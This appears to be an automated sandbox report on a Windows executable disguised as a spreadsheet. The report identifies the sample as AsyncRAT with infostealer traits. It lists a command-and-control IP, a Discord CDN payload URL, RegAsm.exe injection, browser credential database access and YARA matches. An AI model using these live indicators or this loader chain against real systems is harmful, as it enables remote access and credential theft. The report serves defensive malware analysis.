              Source: unknownTCP traffic detected without corresponding DNS query: 178.215.236.218
              Source: unknownTCP traffic detected without corresponding DNS query: 178.215.236.218
              Source: unknownTCP traffic detected without corresponding DNS query: 178.215.236.218
              Source: unknownTCP traffic detected without corresponding DNS query: 178.215.236.218
              Source: unknownTCP traffic detected without corresponding DNS query: 178.215.236.218
              Source: unknownTCP traffic detected without corresponding DNS query: 178.215.236.218
              Source: unknownTCP traffic detected without corresponding DNS query: 178.215.236.218
              Source: unknownTCP traffic detected without corresponding DNS query: 178.215.236.218
              Source: unknownTCP traffic detected without corresponding DNS query: 178.215.236.218
              Source: unknownTCP traffic detected without corresponding DNS query: 178.215.236.218
              Source: unknownTCP traffic detected without corresponding DNS query: 178.215.236.218
              Source: unknownTCP traffic detected without corresponding DNS query: 178.215.236.218
              Source: unknownTCP traffic detected without corresponding DNS query: 178.215.236.218
              Source: unknownTCP traffic detected without corresponding DNS query: 178.215.236.218
              Source: unknownTCP traffic detected without corresponding DNS query: 178.215.236.218
              Source: unknownTCP traffic detected without corresponding DNS query: 178.215.236.218
              Source: unknownTCP traffic detected without corresponding DNS query: 178.215.236.218
              Source: unknownTCP traffic detected without corresponding DNS query: 178.215.236.218
              Source: unknownTCP traffic detected without corresponding DNS query: 178.215.236.218
              Source: unknownTCP traffic detected without corresponding DNS query: 178.215.236.218
              Source: unknownTCP traffic detected without corresponding DNS query: 178.215.236.218
              Source: unknownTCP traffic detected without corresponding DNS query: 178.215.236.218
              Source: unknownTCP traffic detected without corresponding DNS query: 178.215.236.218
              Source: unknownTCP traffic detected without corresponding DNS query: 178.215.236.218
              Source: unknownTCP traffic detected without corresponding DNS query: 178.215.236.218
              Source: unknownTCP traffic detected without corresponding DNS query: 178.215.236.218
              Source: unknownTCP traffic detected without corresponding DNS query: 178.215.236.218
              Source: unknownTCP traffic detected without corresponding DNS query: 178.215.236.218
              Source: unknownTCP traffic detected without corresponding DNS query: 178.215.236.218
              Source: unknownTCP traffic detected without corresponding DNS query: 178.215.236.218
              Source: unknownTCP traffic detected without corresponding DNS query: 178.215.236.218
              Source: unknownTCP traffic detected without corresponding DNS query: 178.215.236.218
              Source: unknownTCP traffic detected without corresponding DNS query: 178.215.236.218
              Source: unknownTCP traffic detected without corresponding DNS query: 178.215.236.218
              Source: unknownTCP traffic detected without corresponding DNS query: 178.215.236.218
              Source: unknownTCP traffic detected without corresponding DNS query: 178.215.236.218
              Source: unknownTCP traffic detected without corresponding DNS query: 178.215.236.218
              Source: unknownTCP traffic detected without corresponding DNS query: 178.215.236.218
              Source: global trafficHTTP traffic detected: GET /attachments/1288648799220400244/1288791621017669705/xxxxxxxxxxx.txt?ex=66f6783b&is=66f526bb&hm=22a3bafe0f63ec86e36ba63ace27289331a1b6e8c8a217e16ac633d8848215f6& HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive
              Source: global trafficDNS traffic detected: DNS query: cdn.discordapp.com
              Source: rDoc5633276235623657_xls.exe, 00000000.00000002.1784666277.0000000002D63000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cdn.discordapp.com
              Source: rDoc5633276235623657_xls.exe, 00000000.00000002.1784666277.0000000002D63000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cdn.discordapp.comd
              Source: RegAsm.exe, 00000002.00000002.2660991014.0000000006AD0000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: http://james.newtonking.com/projects/json
              Source: rDoc5633276235623657_xls.exe, 00000000.00000002.1784666277.0000000002CE1000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2654703990.0000000002DD1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
              Source: Amcache.hve.9.drString found in binary or memory: http://upx.sf.net
              Source: RegAsm.exe, 00000002.00000002.2656518468.0000000003E53000.00000004.00000800.00020000.00000000.sdmp, tmpA7EC.tmp.dat.2.dr, tmp1D00.tmp.dat.2.drString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
              Source: rDoc5633276235623657_xls.exe, 00000000.00000002.1784666277.0000000002D56000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.discordapp.com
              Source: rDoc5633276235623657_xls.exeString found in binary or memory: https://cdn.discordapp.com/attachments/1288648799220400244/1288791621017669705/xxxxxxxxxxx.txt?ex=66
              Source: RegAsm.exe, 00000002.00000002.2656518468.0000000003E53000.00000004.00000800.00020000.00000000.sdmp, tmpA7EC.tmp.dat.2.dr, tmp1D00.tmp.dat.2.drString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
              Source: RegAsm.exe, 00000002.00000002.2656518468.0000000003E53000.00000004.00000800.00020000.00000000.sdmp, tmpA7EC.tmp.dat.2.dr, tmp1D00.tmp.dat.2.drString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
              Source: RegAsm.exe, 00000002.00000002.2656518468.0000000003E53000.00000004.00000800.00020000.00000000.sdmp, tmpA7EC.tmp.dat.2.dr, tmp1D00.tmp.dat.2.drString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
              Source: RegAsm.exe, 00000002.00000002.2656518468.0000000003E53000.00000004.00000800.00020000.00000000.sdmp, tmpA7EC.tmp.dat.2.dr, tmp1D00.tmp.dat.2.drString found in binary or memory: https://duckduckgo.com/ac/?q=
              Source: RegAsm.exe, 00000002.00000002.2656518468.0000000003E53000.00000004.00000800.00020000.00000000.sdmp, tmpA7EC.tmp.dat.2.dr, tmp1D00.tmp.dat.2.drString found in binary or memory: https://duckduckgo.com/chrome_newtab
              Source: RegAsm.exe, 00000002.00000002.2656518468.0000000003E53000.00000004.00000800.00020000.00000000.sdmp, tmpA7EC.tmp.dat.2.dr, tmp1D00.tmp.dat.2.drString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
              Source: RegAsm.exe, 00000002.00000002.2654703990.0000000002DD1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/LimerBoy/StormKitty
              Source: places.raw.2.drString found in binary or memory: https://support.mozilla.org
              Source: places.raw.2.drString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
              Source: places.raw.2.drString found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.zvXrErQ5GYDF
              Source: RegAsm.exe, 00000002.00000002.2656518468.0000000003E3B000.00000004.00000800.00020000.00000000.sdmp, tmp1CF0.tmp.dat.2.drString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
              Source: RegAsm.exe, 00000002.00000002.2656518468.0000000003E16000.00000004.00000800.00020000.00000000.sdmp, tmp1CF0.tmp.dat.2.drString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples
              Source: RegAsm.exe, 00000002.00000002.2656518468.0000000003E3B000.00000004.00000800.00020000.00000000.sdmp, tmp1CF0.tmp.dat.2.drString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
              Source: RegAsm.exe, 00000002.00000002.2656518468.0000000003E16000.00000004.00000800.00020000.00000000.sdmp, tmp1CF0.tmp.dat.2.drString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install
              Source: RegAsm.exe, 00000002.00000002.2660991014.0000000006AD0000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://urn.to/r/sds_see
              Source: RegAsm.exe, 00000002.00000002.2660991014.0000000006AD0000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://urn.to/r/sds_seeaCould
              Source: RegAsm.exe, 00000002.00000002.2656518468.0000000003E53000.00000004.00000800.00020000.00000000.sdmp, tmpA7EC.tmp.dat.2.dr, tmp1D00.tmp.dat.2.drString found in binary or memory: https://www.ecosia.org/newtab/
              Source: RegAsm.exe, 00000002.00000002.2656518468.0000000003E53000.00000004.00000800.00020000.00000000.sdmp, tmpA7EC.tmp.dat.2.dr, tmp1D00.tmp.dat.2.drString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
              Source: places.raw.2.drString found in binary or memory: https://www.mozilla.org
              Source: places.raw.2.drString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.VsJpOAWrHqB2
              Source: places.raw.2.drString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.n0g9CLHwD9nR
              Source: RegAsm.exe, 00000002.00000002.2656518468.00000000041B5000.00000004.00000800.00020000.00000000.sdmp, tmp743.tmp.dat.2.dr, places.raw.2.drString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
              Source: places.raw.2.drString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
              Source: RegAsm.exe, 00000002.00000002.2656518468.00000000041B5000.00000004.00000800.00020000.00000000.sdmp, tmp743.tmp.dat.2.dr, places.raw.2.drString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
              Source: RegAsm.exe, 00000002.00000002.2660991014.0000000006AD0000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://www.newtonsoft.com/jsonschema
              Source: RegAsm.exe, 00000002.00000002.2660991014.0000000006AD0000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://www.nuget.org/packages/Newtonsoft.Json.Bson
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
              Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
              Source: unknownHTTPS traffic detected: 162.159.135.233:443 -> 192.168.2.4:49730 version: TLS 1.2

              Operating System Destruction

              barindex
              Protects its processes via BreakOnTermination flag
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: 01 00 00 00 Jump to behavior

              System Summary

              barindex
              Malicious sample detected (through community Yara rule)
              Source: 0.2.rDoc5633276235623657_xls.exe.2dd3eb4.1.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
              Source: 2.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
              Source: 0.2.rDoc5633276235623657_xls.exe.2dcb45c.0.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
              Source: 0.2.rDoc5633276235623657_xls.exe.2dc2a1c.2.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
              Source: 0.2.rDoc5633276235623657_xls.exe.2dd3eb4.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
              Source: 0.2.rDoc5633276235623657_xls.exe.2dcb45c.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
              Source: 0.2.rDoc5633276235623657_xls.exe.2dc2a1c.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
              Source: 2.2.RegAsm.exe.6ad0000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
              Source: 2.2.RegAsm.exe.6ad0000.1.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
              Source: 00000002.00000002.2652861730.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
              Source: 00000000.00000002.1784666277.0000000002DB4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
              Source: 00000002.00000002.2660991014.0000000006AD0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
              Source: C:\Users\user\Desktop\rDoc5633276235623657_xls.exeCode function: 0_2_02B02B280_2_02B02B28
              Source: C:\Users\user\Desktop\rDoc5633276235623657_xls.exeCode function: 0_2_02B011D80_2_02B011D8
              Source: C:\Users\user\Desktop\rDoc5633276235623657_xls.exeCode function: 0_2_02B02B210_2_02B02B21
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_013341502_2_01334150
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_013310302_2_01331030
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0133E2502_2_0133E250
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_013394A02_2_013394A0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_01333B572_2_01333B57
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_01339D702_2_01339D70
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0133DC292_2_0133DC29
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0133BC502_2_0133BC50
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_013391582_2_01339158
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_013316282_2_01331628
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_066024E82_2_066024E8
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_066056702_2_06605670
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0666B4082_2_0666B408
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_066614982_2_06661498
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_066600402_2_06660040
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0666DB202_2_0666DB20
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_066614882_2_06661488
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0666F5582_2_0666F558
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0666B3F82_2_0666B3F8
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0666A3882_2_0666A388
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_066600222_2_06660022
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_06660F282_2_06660F28
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_06660F182_2_06660F18
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_06684A182_2_06684A18
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_066882D82_2_066882D8
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_066810102_2_06681010
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_06681D482_2_06681D48
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_06684A082_2_06684A08
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_066882CA2_2_066882CA
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_06680FFF2_2_06680FFF
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0668B7A42_2_0668B7A4
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0668B8102_2_0668B810
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_066879C82_2_066879C8
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_066849D82_2_066849D8
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7008 -s 2044
              Source: rDoc5633276235623657_xls.exe, 00000000.00000000.1768699604.0000000000982000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameHSDSDF32.exe2 vs rDoc5633276235623657_xls.exe
              Source: rDoc5633276235623657_xls.exe, 00000000.00000002.1783472169.00000000010AE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs rDoc5633276235623657_xls.exe
              Source: rDoc5633276235623657_xls.exe, 00000000.00000002.1784666277.0000000002DB4000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamekok.exe4 vs rDoc5633276235623657_xls.exe
              Source: rDoc5633276235623657_xls.exeBinary or memory string: OriginalFilenameHSDSDF32.exe2 vs rDoc5633276235623657_xls.exe
              Source: rDoc5633276235623657_xls.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
              Source: 0.2.rDoc5633276235623657_xls.exe.2dd3eb4.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
              Source: 2.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
              Source: 0.2.rDoc5633276235623657_xls.exe.2dcb45c.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
              Source: 0.2.rDoc5633276235623657_xls.exe.2dc2a1c.2.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
              Source: 0.2.rDoc5633276235623657_xls.exe.2dd3eb4.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
              Source: 0.2.rDoc5633276235623657_xls.exe.2dcb45c.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
              Source: 0.2.rDoc5633276235623657_xls.exe.2dc2a1c.2.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
              Source: 2.2.RegAsm.exe.6ad0000.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
              Source: 2.2.RegAsm.exe.6ad0000.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
              Source: 00000002.00000002.2652861730.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
              Source: 00000000.00000002.1784666277.0000000002DB4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
              Source: 00000002.00000002.2660991014.0000000006AD0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
              Source: rDoc5633276235623657_xls.exe, DyyVDbaRvM1YfIq9il.csCryptographic APIs: 'CreateDecryptor'
              Source: rDoc5633276235623657_xls.exe, DyyVDbaRvM1YfIq9il.csCryptographic APIs: 'CreateDecryptor'
              Source: rDoc5633276235623657_xls.exe, AesHelper.csCryptographic APIs: 'CreateDecryptor'
              Source: 0.2.rDoc5633276235623657_xls.exe.2dcb45c.0.raw.unpack, Helper.csCryptographic APIs: 'TransformFinalBlock'
              Source: 0.2.rDoc5633276235623657_xls.exe.2dcb45c.0.raw.unpack, Helper.csCryptographic APIs: 'TransformFinalBlock'
              Source: 0.2.rDoc5633276235623657_xls.exe.2dcb45c.0.raw.unpack, AlgorithmAES.csCryptographic APIs: 'TransformFinalBlock'
              Source: 0.2.rDoc5633276235623657_xls.exe.2dc2a1c.2.raw.unpack, Helper.csCryptographic APIs: 'TransformFinalBlock'
              Source: 0.2.rDoc5633276235623657_xls.exe.2dc2a1c.2.raw.unpack, Helper.csCryptographic APIs: 'TransformFinalBlock'
              Source: 0.2.rDoc5633276235623657_xls.exe.2dc2a1c.2.raw.unpack, AlgorithmAES.csCryptographic APIs: 'TransformFinalBlock'
              Source: 0.2.rDoc5633276235623657_xls.exe.2dd3eb4.1.raw.unpack, Helper.csCryptographic APIs: 'TransformFinalBlock'
              Source: 0.2.rDoc5633276235623657_xls.exe.2dd3eb4.1.raw.unpack, Helper.csCryptographic APIs: 'TransformFinalBlock'
              Source: 0.2.rDoc5633276235623657_xls.exe.2dd3eb4.1.raw.unpack, ClientSocket.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
              Source: 0.2.rDoc5633276235623657_xls.exe.2dd3eb4.1.raw.unpack, ClientSocket.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
              Source: 0.2.rDoc5633276235623657_xls.exe.2dc2a1c.2.raw.unpack, ClientSocket.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
              Source: 0.2.rDoc5633276235623657_xls.exe.2dc2a1c.2.raw.unpack, ClientSocket.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
              Source: 0.2.rDoc5633276235623657_xls.exe.2dcb45c.0.raw.unpack, ClientSocket.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
              Source: 0.2.rDoc5633276235623657_xls.exe.2dcb45c.0.raw.unpack, ClientSocket.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
              Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@6/20@1/2
              Source: C:\Users\user\Desktop\rDoc5633276235623657_xls.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\rDoc5633276235623657_xls.exe.logJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMutant created: NULL
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMutant created: \Sessions\1\BaseNamedObjects\OeRWZLHs1gN7FCy5
              Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7008
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\Users\user\AppData\Local\Temp\tmpA7EC.tmpJump to behavior
              Source: rDoc5633276235623657_xls.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              Source: rDoc5633276235623657_xls.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile read: C:\Users\desktop.iniJump to behavior
              Source: C:\Users\user\Desktop\rDoc5633276235623657_xls.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: tmp1CCF.tmp.dat.2.drBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
              Source: unknownProcess created: C:\Users\user\Desktop\rDoc5633276235623657_xls.exe "C:\Users\user\Desktop\rDoc5633276235623657_xls.exe"
              Source: C:\Users\user\Desktop\rDoc5633276235623657_xls.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
              Source: C:\Users\user\Desktop\rDoc5633276235623657_xls.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7008 -s 2044
              Source: C:\Users\user\Desktop\rDoc5633276235623657_xls.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"Jump to behavior
              Source: C:\Users\user\Desktop\rDoc5633276235623657_xls.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"Jump to behavior
              Source: C:\Users\user\Desktop\rDoc5633276235623657_xls.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Users\user\Desktop\rDoc5633276235623657_xls.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Users\user\Desktop\rDoc5633276235623657_xls.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\Desktop\rDoc5633276235623657_xls.exeSection loaded: version.dllJump to behavior
              Source: C:\Users\user\Desktop\rDoc5633276235623657_xls.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Users\user\Desktop\rDoc5633276235623657_xls.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Users\user\Desktop\rDoc5633276235623657_xls.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Users\user\Desktop\rDoc5633276235623657_xls.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Users\user\Desktop\rDoc5633276235623657_xls.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Users\user\Desktop\rDoc5633276235623657_xls.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Users\user\Desktop\rDoc5633276235623657_xls.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Users\user\Desktop\rDoc5633276235623657_xls.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Users\user\Desktop\rDoc5633276235623657_xls.exeSection loaded: rasapi32.dllJump to behavior
              Source: C:\Users\user\Desktop\rDoc5633276235623657_xls.exeSection loaded: rasman.dllJump to behavior
              Source: C:\Users\user\Desktop\rDoc5633276235623657_xls.exeSection loaded: rtutils.dllJump to behavior
              Source: C:\Users\user\Desktop\rDoc5633276235623657_xls.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Users\user\Desktop\rDoc5633276235623657_xls.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Users\user\Desktop\rDoc5633276235623657_xls.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\rDoc5633276235623657_xls.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\rDoc5633276235623657_xls.exeSection loaded: dhcpcsvc6.dllJump to behavior
              Source: C:\Users\user\Desktop\rDoc5633276235623657_xls.exeSection loaded: dhcpcsvc.dllJump to behavior
              Source: C:\Users\user\Desktop\rDoc5633276235623657_xls.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Users\user\Desktop\rDoc5633276235623657_xls.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Users\user\Desktop\rDoc5633276235623657_xls.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Users\user\Desktop\rDoc5633276235623657_xls.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Users\user\Desktop\rDoc5633276235623657_xls.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Users\user\Desktop\rDoc5633276235623657_xls.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Users\user\Desktop\rDoc5633276235623657_xls.exeSection loaded: schannel.dllJump to behavior
              Source: C:\Users\user\Desktop\rDoc5633276235623657_xls.exeSection loaded: mskeyprotect.dllJump to behavior
              Source: C:\Users\user\Desktop\rDoc5633276235623657_xls.exeSection loaded: ntasn1.dllJump to behavior
              Source: C:\Users\user\Desktop\rDoc5633276235623657_xls.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Users\user\Desktop\rDoc5633276235623657_xls.exeSection loaded: ncryptsslp.dllJump to behavior
              Source: C:\Users\user\Desktop\rDoc5633276235623657_xls.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Users\user\Desktop\rDoc5633276235623657_xls.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: aclayers.dllJump to behavior
